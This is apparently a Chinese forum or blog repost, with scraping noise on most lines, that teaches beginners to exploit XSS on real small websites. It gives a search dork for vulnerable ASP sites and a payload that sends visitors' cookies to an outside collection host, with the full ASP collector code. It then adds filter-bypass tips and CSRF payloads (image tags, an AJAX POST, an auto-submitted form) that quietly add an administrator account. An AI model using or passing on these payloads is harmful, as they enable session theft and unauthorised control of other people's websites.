前天贴吧一位朋友发了个后台XSS利用的帖子,大家就一起讨论了讨论,原帖为: " [2 y. D1 P9 y; ]& ]5 ~
- s- X9 J) {) j/ v9 Shttp://tieba.baidu.com/f?kz=1069007239
/ h$ Z' x @% T" I/ }- Q+ K
4 }. f" r4 E% T* {% Q这个帖子说的只是一个思路,不是很详细,并且说的是利用后台XSS挂马的情况,但是其实在后台挂马一般是不会牵扯到XSS的,只是一个过滤不过滤转换不转换的问题,比如很多带编辑器的后台,都是不过滤不转换在文章中的html代码的,比如eweb,你可以直接编辑发表文章的时候的html代码,这就为挂马、盗cookie提供了很多机会。
0 _4 \2 L/ v. f# q7 I8 B5 m. I5 L+ E N5 W, [
但是,我想说的是,即使是挂马、盗cookie,也是不会使用location这种手法的,因为这样太明显了,一般都是使用普通挂马的手法的,比如iframe、JS等等。- b# ^: ~) Z. {
]: H- _4 e5 u) U
我在上边的帖子中说作者讲的不是很详细,希望出一个详细点的利用教程,于是今天又一位朋友就发了一个详细些的文章,我这里就发大博客里,让更多需要的朋友看到这篇文章。
/ P. w7 ?2 J" X3 J
5 {6 ^2 l" ^3 J这个文章是对XSS的一个很简单的利用,原理很简单,主要用于科普,只是想让朋友们知道,XSS并不是简单的弹个框框玩那么简单的,是有很多利用价值的,在国外,XSS已经被列为网站杀手之一,包括国内的很多大站,大家都把心思放到了防范SQL注入上,相应的对XSS的防范就很少,这也是XSS总是能成功的原因之一。
8 z$ g3 b3 C9 `0 e6 _0 Z8 _% y. K, ?% f
好了,废话不多说了,一起来看文章吧。
. E- T- x3 N/ S, s) B/ f" c/ ?4 b* m! v2 N7 r* T
-------------------------------------------------------------------5 ?* @7 O8 L0 z/ O
0 w# @! C# _% y首先要找到一个有XXS的站,这里就不整什么大站了,谷歌一下inurl:'Product.asp?BigClassName',搜出来的命中率也比较高。随便找一个,先<script>alert('xxs')</script>一下。呵呵,框框出来了。/ x7 X' b; Q% T# Y' i7 Y6 ^! h% u
! \# r0 S1 g. d# _
8 F5 ?1 Q, h+ k, X6 v
2 S& R% \: |9 y6 ]; a; h% T# U再看看自己的Cookie吧,把alert里面的内容换成document.cookie就可以了,如图:! b: \1 `2 g3 u- Z
. X4 E9 i5 p9 c- ~8 I
) [+ r2 h1 |- p- P v
# \% i/ R4 j$ d* e
这里就是要把弹出来框框里的东西收集到我们的记事本里。这里,要玩这个步骤就需要一个你自己的站点,具体思路就是. \( v5 F* J* r8 a; O
1:让目标访问已跨站的网址,然后这个网址执行脚本
6 a7 R- E: [/ D: |1 G) `+ S+ j, I2:然后跳转到你已经写好专门用来收集Cookie的网址
' U% q# `7 r" e6 |! _# a9 j) R! p& n5 x9 x; L
具体实现方法:
( G& @" J: R* \$ F* q先构造语句<script>window.open('http://dlgyi.rrvv.net/cookie.asp?msg='+document.cookie)</script>
7 i9 A/ |: }( f7 L+ Q这句话意思是打开一个新的窗口,访问http://dlgyi.rrvv.net/cookie.asp这个网址,并且通过msg传递一个变量,这里的变量就是我们要收集的cookie了。% e! z. [& d: N% |5 Z
! ^1 r+ l# o" c9 }: m8 W
这里需要自己写一个页面,也就是收集对方发过来cookie的页面,代码是这样的:3 R) y/ a2 o1 \
( K" E" f) i' @7 K* r<html>
. n3 K; `" w7 S+ x+ L: R<title>xx</title>; c0 b/ v+ B* l8 s
<body>
( O* X: s' o! l3 ~; [( _<%7 W7 `+ T: {: w$ ?1 n" @
testfile = Server.MapPath("code.txt") //先构造一个路径,也就是取网站根目录,创造一个在根目录下的code.txt路径,保存在testfile中
6 t0 E/ g4 t$ D7 ^: S% wmsg = Request("msg") //获取提交过来的msg变量,也就是cookie值
0 f7 l% K5 h# X q: j `1 t) Kset fs = server.CreateObject("scripting.filesystemobject")创建一个fs对象
( I. a$ `* E8 O& J. Aset thisfile = fs.OpenTextFile(testfile,8,True,0): H2 V% F' k* o+ {8 y: u
thisfile.WriteLine(""&msg&"")//像code.txt中写入获取来的cookie
7 }& N1 p0 W+ i1 r* c7 i' v2 uthisfile.close //关闭
, T3 {. D7 M9 q" Dset fs = nothing
3 ]. }6 {5 M p& o k%>
/ j, @- J! y2 _! A+ P, [- Z) J</body>
% x) ^- ^# E+ s% J</html>) g" K" j* T! S# d: ?
- F8 D( G" O& [ B) }' X* c
然后保存,放在你自己服务器上,如果有人点击构造好的XXS页面,就会自动在你网站的根目录生成一个文本:
* ]+ T8 S: o! f# i2 w. S& ~ c1 F. ~% P- x
( R( }" M7 [" a0 C ! p5 z2 X$ R9 R% Y6 d; u1 C
+ ]% g6 v) ?$ A0 [5 e7 `" o2 e/ o拿出来看看,呵呵,Cookie到手:, C8 A' t% W( G7 ?
8 y6 f# C# Z: Z* _2 ]& ^ 9 o. c1 B1 [* I4 J$ F
4 V# P2 i6 x3 A: c2 H本文只是抛砖引玉,而且没有多大的实战价值,一来很多网站都过滤掉了+号这个字符连接符,二来稍大点的站,也不会存在如此的XXS,本文旨在给新手一个练习的向导,毕竟不可能谁一开始学习就可以RI掉大站,从小站开始练手,一起进步。话说咱也是新手O(∩_∩)O~
1 ?2 O6 ^% T/ r8 G" n5 U6 o6 p, W; C4 T8 B) P
PS:一点小提示,如果提交<script>alert('xxs')</script>网站没有反应时,不要立刻就点X。你可以鼠标右击,查看一下网站的源码,看看网站到底过滤掉了什么字符,通过编码啊神马的发挥下智慧,绕过过滤。只要出现小框框,咱就胜利了。3 n1 ~$ D/ g% j" J
& s& T$ s. }5 H9 q
-------------------------------------------------------------------- T; Y# \7 y3 Z$ l) _9 m" O# w! Y
+ e4 F$ B: v Y) I2 v$ y) C' o3 [
下面是我对这个帖子的回复,也一起贴过来吧:: w* G' p+ I& t- o/ ~% b& g* ~
2 I" Q4 } @1 A7 l6 U: ]
说实话,像这种后台XSS其实作用不大的,一般的小站你拿到cookie也没什么利用价值,大点的站的话,或许可以用cookie盗点装备什么的,但那牵扯的多了,不过对于普通脚本小子来说,日站的时候除非毫无办法了还会想到XSS的,不过日站时候的XSS利用方法跟这篇文章里讲的差不多的,可以借鉴一下。
& F$ S r5 T( ~; f
# w, t3 T2 i0 A但是,这里的文章讲的是针对已经进入后台、拿shell无望又想多获得点东西的情况,说它鸡肋的原因是,你知道的,现在大部分站都是cookie+session的,并且一般用户名和密码不会直接放到cookie里了,这是它鸡肋的原因。
" m! B' K; e- _3 @( l `再者,日站的时候盗cookie一般是想进后台,但是如果遇到网上有源码的情况的话,还可以进一步利用,比如添加个管理员什么的。* x3 b$ W+ M2 W$ Z9 r
; v% ^' K$ p q J/ G3 E' z3 a( S在文章的最后,顺便贴上一般XSS的利用思路,也不是原创,原文链接:3 |3 C5 s E6 u% m* j1 n
/ n9 Y7 _ w5 S2 H$ f2 B
http://user.qzone.qq.com/673116767/blog/1252452536( ^3 R& o! x; w, c
* g( B4 t2 @- [. k9 U1 ~% P一般发现一个xss漏洞后要做的基本上就是这些:
. K9 j. B% }4 u( B0 S
3 D# D/ s6 |% l) n3 J# B# Z1. 伪造请求 使用$_REQUEST或$_GET& T {( M, w8 t+ i
* n5 s. W) [- ~6 N; j4 r M1 A$ i首先我们要找找该网站使用的程序是不是在网上能找到源码,如果能找到源码的话,就去分析后台管理员更改密码或者增加管理员的页面,然后分析管理员使用的是不是$_REQUEST接收参数,如果是的话,我们使用该XSS漏洞构造一个请求,比如前台发表留言中可以使用HTML代码,那么我们就嵌入一个IMG元素:! z+ c$ @& L6 E9 |# U; Z4 R
<img src="/admin/admin_add.asp?name=xxx&psd=yyy" />9 y5 z3 K: F3 S' A/ c! Y q! S! V
当管理员登录管理后台后看到包含img的页面的时候,就伪造了一个增加后台管理员的请求,而该请求是由管理员发出的,所以顺利的增加了一个新的管理员。, J! \. r, {! z' Z5 c" d
, i0 H% q' |% B0 i2 |2 f+ c$ z
如果是可视文本编辑器,可以尝试使用输入:0 ~7 O% O E! C# c8 V! n& f
http://www.drvfan.com/xxx.jpg" onload="window.open('/admin/admin_add.asp?name=xxx&psd=yyy')
8 H# S0 | Q) c, `. Z这样最终会构造出:0 M; }. ~, @& T0 D: H
<img src="http://www.drvfan.com/xxx.jpg" onload="window.open('/admin/admin_add.asp?name=xxx&psd=yyy',0,0)" />
% V) V7 G/ `9 f3 {总之要举一反三。6 D' R) F% E9 Q, {, f
! e9 k! w( }7 R) M7 @2. 伪造请求 使用$_POST1 g' U! p6 P+ t& X' u9 r/ L Y
" D+ W; W6 l/ g* _8 D' P6 Y当后台接收增加管理员或更改管理密码的变量时使用的是$_POST方式,那么第一种方法无效,我们视情况而定,如果没有过滤<script>,我们可以通过ajax方式来伪造请求,如:
( M. Q& k! I( u4 k8 ?<sc/*xss*/ript type="text/javascript">
4 w; Y- H0 A( I7 l. dvar aj = new ActiveXObject("MSXML2.XMLHTTP.3.0");- r& A+ Q7 {3 ^& m. g/ A6 R
aj.open("POST", "/admin/admin_add.asp", false);. `0 I# Z. }" u& @2 R3 R4 G3 l
var postdata = 'name=xxx&psd=yyy';
- y" E( \. j4 F& E! ?" w; Eaj.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
, Y( b! @) Q8 F3 b$ ]) d* ~aj.send(postdata);5 \7 Y3 n3 j3 Q0 r
</scr/*xss*/ipt>% Q& L0 _+ O4 d, s" ~, ^
/*xss*/是HTML注释,用来绕过简单的对script代码块的过滤。
. C) Z2 ?+ J4 _7 R* l4 l& d: _/ f7 @# l$ y, f! U1 D; l
3. 跨站伪造请求 使用$_GET 或 $_REQUEST
9 O; y8 x9 C& }5 s, n4 o, I# p! N& p$ `: X+ [1 |
与第一种伪造请求的方式相似,但是第一种伪造请求是利用站内的xss漏洞进行的,而跨站伪造请求,是站外发起的,比如我在我的博客的首页放了这样一个图片+ W& j# }/ a l
<img src="http://www.drvfan.com/admin/admin_add.asp?user=xxx&psd=yyy"/>
' f! {0 d/ ]3 E0 a6 m, V" i- r然后我跑到dvbbs上发帖子,“勾引”动网论坛的管理员来我的博客,如果动网论坛的管理员已经登录了他的管理后台,然后使用共享进程的浏览器(目前基于ie内核的myie,maxton等等还有firefox都是共享进程的)来访问我的博客,那么他的后台就会被加入一个用户。0 \7 W9 S* _) K+ X- d5 `% I0 [
3 P6 _ ^6 R5 J' ?4.跨站伪造请求 使用$_POST(0day)
|3 o4 o" L9 L% H: }# A
) N6 E! V) G k" x& M+ o如果入侵目标的管理后台使用的是$_POST方式来接受变量,那么我们无法在我们的网站跨站使用ajax的post方式提交数据过去,因为ajax是无法跨域的。 n# u% K. T4 m# _
& k1 q4 e- T- D( T6 w5 _( s
但是我们可以在我们的网站放一个form,里面填写好数据,form的action为要利用的有漏洞的页面,然后当有人打开该页面的时候,我们就用js控制该form进行submit,ajax虽然不能跨域,但向域之外的地址提交form总是可以的。
- y( V: j6 u7 F6 y+ x$ a! t, b- S2 c- Z
总之,第3,4种方法成功几率要小一些,因为我们要想办法让已经登录自身后台的管理员,使用共享session的浏览器访问我们的伪造请求的页面,有一点社会工程学的技术含量。
W. M* J3 l8 Z3 G& p4 U+ f3 H" k }; i8 P1 O# c! A* l- E2 N m2 a" p1 \
OK,该说的都说完了,Over。" a& w- T d6 v" q, j. Q/ f" O5 A# d7 y
|